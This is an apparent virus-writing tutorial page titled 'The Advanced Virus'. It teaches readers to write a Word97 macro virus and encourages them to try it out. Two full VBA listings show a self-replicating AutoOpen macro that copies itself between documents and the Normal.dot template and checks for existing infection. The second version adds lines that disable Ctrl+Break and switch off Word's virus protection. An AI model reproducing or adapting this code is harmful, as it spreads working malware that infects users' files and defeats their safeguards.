<html>

<head>
<title></title>
</head>

<body background="bg1.jpg" bgcolor="#000000" text="#FFFFFF">

<h1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<font color="#D00909">The Advanced Virus</font></h1>

<pre>       Note! If you want to bee good, you have to try out, and explore!</pre>

<p>We wrote in the last level, a very simple virus, it would work, but not very well. The
virus would spead and spread and the<br>
files would grow on and on... to avoid this you've to check. Check routines depends on the
virus!! If you write a modul<br>
virus, with a fix name, you can identify the virus, by the modul name. So did the first
virii, wich were around, and so we will<br>
do it too in this level:</p>

<p>Modulname: <font color="#2803DA">Virus2</font></p>

<p><big>Sub AutoOpen()</big><br>
<big>If UCase(ThisDocument.Name) = &quot;NORMAL.DOT&quot; Then<br>
&nbsp;&nbsp;&nbsp; For i=1 to ActiveDocument.VBProject.VBComponents.Count<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; If
ActiveDocument.VBProject.VBComponents(i).Name=&quot;<font color="#2803DA">Virus2</font>&quot;
Then Goto EndOfVirus</big><br>
<big>&nbsp;&nbsp;&nbsp; Next i</big><br>
<big>&nbsp;&nbsp; VSource=NormalTemplate.FullName</big><br>
<big>&nbsp;&nbsp;&nbsp; VDestiny=ActiveDocument.FullName<br>
Else<br>
&nbsp;&nbsp;&nbsp; For i=1 to NormalTemplate.VBProject.VBComponents.Count<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; If
NormalTemplate.VBProject.VBComponents(i).Name=&quot;<font color="#2803DA">Virus2</font>&quot;
Then Goto EndOfVirus<br>
&nbsp;&nbsp;&nbsp; Next i</big><br>
<big>&nbsp;&nbsp;&nbsp; VSource=ActiveDocument.FullName</big><br>
<big>&nbsp;&nbsp;&nbsp; VDestiny=NormalTemplate.FullName<br>
End if</big><br>
<big>Application.OrganizerCopy VSource, VDestiny, &quot;ExampleVirus&quot;,
wdOrganizerObjectProjectItems<br>
EndOfVirus:<br>
End Sub</big><font color="#2803DA"><br>
<br>
</font>Ok, you see, this virus uses an infection routine and a check routine. Well, now
we've a good and short virus, but without<br>
any prodection. Prodection also depends on the virus!!</p>

<p>Modulname: <font color="#2803DA">Virus2<br>
<br>
</font><big>Sub AutoOpen()</big><br>
<font color="#BC0C07"><big>Application.EnableCancelKey=False</big><br>
<big>Options.VirusProtection=False</font><font color="#F51712"><br>
</font>If UCase(ThisDocument.Name) = &quot;NORMAL.DOT&quot; Then<br>
&nbsp;&nbsp;&nbsp; For i=1 to ActiveDocument.VBProject.VBComponents.Count<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; If
ActiveDocument.VBProject.VBComponents(i).Name=&quot;<font color="#2803DA">Virus2</font>&quot;
Then Goto EndOfVirus</big><br>
<big>&nbsp;&nbsp;&nbsp; Next i</big><br>
<big>&nbsp;&nbsp; VSource=NormalTemplate.FullName</big><br>
<big>&nbsp;&nbsp;&nbsp; VDestiny=ActiveDocument.FullName<br>
Else<br>
&nbsp;&nbsp;&nbsp; For i=1 to NormalTemplate.VBProject.VBComponents.Count<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; If
NormalTemplate.VBProject.VBComponents(i).Name=&quot;<font color="#2803DA">Virus2</font>&quot;
Then Goto EndOfVirus<br>
&nbsp;&nbsp;&nbsp; Next i</big><br>
<big>&nbsp;&nbsp;&nbsp; VSource=ActiveDocument.FullName</big><br>
<big>&nbsp;&nbsp;&nbsp; VDestiny=NormalTemplate.FullName<br>
End if</big><br>
<big>Application.OrganizerCopy VSource, VDestiny, &quot;ExampleVirus&quot;,
wdOrganizerObjectProjectItems<br>
EndOfVirus:<br>
End Sub</big></p>

<p>The first line bellow Sub AoutoOpen() disables the Break (Ctrl+Break), that means, the
usere isn't able to interrupt the virus<br>
by Ctrl-Break.<br>
The second line disables the virus prodection of Word97. (I hope you all know what I mean)</p>

<pre>now you have a prodected virus that checks for infections</pre>

<p>&nbsp;</p>
</body>
</html>
